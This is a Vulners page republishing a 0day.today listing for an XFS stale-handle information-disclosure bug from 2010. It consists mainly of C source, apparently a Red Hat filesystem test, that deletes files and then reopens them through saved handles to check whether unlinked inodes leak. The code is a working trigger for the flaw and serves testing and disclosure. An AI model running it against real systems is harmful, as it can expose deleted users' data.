Lucene search
K

XFS Deleted Inode Local Information Disclosure Vulnerability

🗓️ 30 Sep 2010 00:00:00Reported by Red HatType 
zdt
 zdt
🔗 0day.today👁 25 Views

XFS Deleted Inode Local Information Disclosure Vulnerabilit

Code
============================================================
XFS Deleted Inode Local Information Disclosure Vulnerability
============================================================

*  stale_handle.c - attempt to create a stale handle and open it
*
*  Copyright (C) 2010 Red Hat, Inc. All Rights reserved.
*
*  This program is free software; you can redistribute it and/or modify
*  it under the terms of the GNU General Public License as published by
*  the Free Software Foundation; either version 2 of the License, or
*  (at your option) any later version.
*
*  This program is distributed in the hope that it will be useful,
*  but WITHOUT ANY WARRANTY; without even the implied warranty of
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
*  GNU General Public License for more details.
*
*  You should have received a copy of the GNU General Public License
*  along with this program; if not, write to the Free Software
*  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
* 
*  Credit: David Chinner
*  The XFS filesystem is prone to a local information-disclosure vulnerability.
*
*  Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.  *  Denial-of-service attacks may also be possible.
*/
 
#define TEST_UTIME
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <errno.h>
#include <xfs/xfs.h>
#include <xfs/handle.h>
 
#define NUMFILES 1024
int main(int argc, char **argv)
{
      int     i;
      int     fd;
      int     ret;
      int     failed = 0;
      char    fname[MAXPATHLEN];
      char    *test_dir;
      void    *handle[NUMFILES];
      size_t  hlen[NUMFILES];
      char    fshandle[256];
      size_t  fshlen;
      struct stat st;
 
 
      if (argc != 2) {
              fprintf(stderr, "usage: stale_handle test_dir\n");
              return EXIT_FAILURE;
      }
 
      test_dir = argv[1];
      if (stat(test_dir, &st) != 0) {
              perror("stat");
              return EXIT_FAILURE;
      }
 
      ret = path_to_fshandle(test_dir, (void **)fshandle, &fshlen);
      if (ret < 0) {
              perror("path_to_fshandle");
              return EXIT_FAILURE;
      }
 
      /*
       * create a large number of files to force allocation of new inode
       * chunks on disk.
       */
      for (i=0; i < NUMFILES; i++) {
              sprintf(fname, "%s/file%06d", test_dir, i);
              fd = open(fname, O_RDWR | O_CREAT | O_TRUNC, 0644);
              if (fd < 0) {
                      printf("Warning (%s,%d), open(%s) failed.\n", __FILE__,
__LINE__, fname);
                      perror(fname);
                      return EXIT_FAILURE;
              }
              close(fd);
      }
 
      /* sync to get the new inodes to hit the disk */
      sync();
 
      /* create the handles */
      for (i=0; i < NUMFILES; i++) {
              sprintf(fname, "%s/file%06d", test_dir, i);
              ret = path_to_handle(fname, &handle[i], &hlen[i]);
              if (ret < 0) {
                      perror("path_to_handle");
                      return EXIT_FAILURE;
              }
      }
 
      /* unlink the files */
      for (i=0; i < NUMFILES; i++) {
              sprintf(fname, "%s/file%06d", test_dir, i);
              ret = unlink(fname);
              if (ret < 0) {
                      perror("unlink");
                      return EXIT_FAILURE;
              }
      }
 
      /* sync to get log forced for unlink transactions to hit the disk */
      sync();
 
      /* sync once more FTW */
      sync();
 
      /*
       * now drop the caches so that unlinked inodes are reclaimed and
       * buftarg page cache is emptied so that the inode cluster has to be
       * fetched from disk again for the open_by_handle() call.
       */
      system("echo 3 > /proc/sys/vm/drop_caches");
 
      /*
       * now try to open the files by the stored handles. Expecting ENOENT
       * for all of them.
       */
      for (i=0; i < NUMFILES; i++) {
              errno = 0;
              fd = open_by_handle(handle[i], hlen[i], O_RDWR);
              if (fd < 0 && errno == ENOENT) {
                      free_handle(handle[i], hlen[i]);
                      continue;
              }
              if (ret >= 0) {
                      printf("open_by_handle(%d) opened an unlinked file!\n",
i);
                      close(fd);
              } else
                      printf("open_by_handle(%d) returned %d incorrectly on
an unlinked file!\n", i, errno);
              free_handle(handle[i], hlen[i]);
              failed++;
      }
      if (failed)
              return EXIT_FAILURE;
      return EXIT_SUCCESS;
}



#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Sep 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
25